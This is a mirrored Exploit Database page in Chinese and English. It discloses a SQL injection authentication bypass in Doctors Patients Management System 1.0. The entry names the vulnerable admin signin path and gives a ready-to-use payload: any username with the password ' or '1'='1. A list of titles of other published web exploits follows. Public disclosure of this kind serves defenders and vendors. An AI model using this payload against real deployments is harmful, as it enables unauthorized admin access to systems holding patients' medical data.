Doctors Patients Management System 1.0 – SQL Injection (Authentication Bypass)

Exploit Database
14 阅读

作者： Murat DEMİRCİ

日期： 2021-06-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50074/

# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.

# Proof of Concept :
http://test.com/PATH/signin

# Username : anything
# Password : ' or '1'='1

last Exploits
Doctors Patients Management System 1.0 – SQL Injection (Authentication Bypass)的更多信息

Netsweeper 2.6.29.8 – SQL Injection：
Ultrabenosaurus ChatBoard – Persistent Cross-Site Scripting：
Joomla! Component NS Download Shop 2.2.6 – ‘id’ SQL Injection：
Osclass – Multiple Input Validation Vulnerabilities：
Selea Targa 512 IP OCR-ANPR Camera – Stream Disclosure (Unauthenticated)：
Joomla! Component Zh YandexMap 6.1.1.0 – ‘placemarklistid’ SQL Injection：
LayerBB 1.1.2 – Cross-Site Scripting：
Group Office – ‘comment_id’ SQL Injection：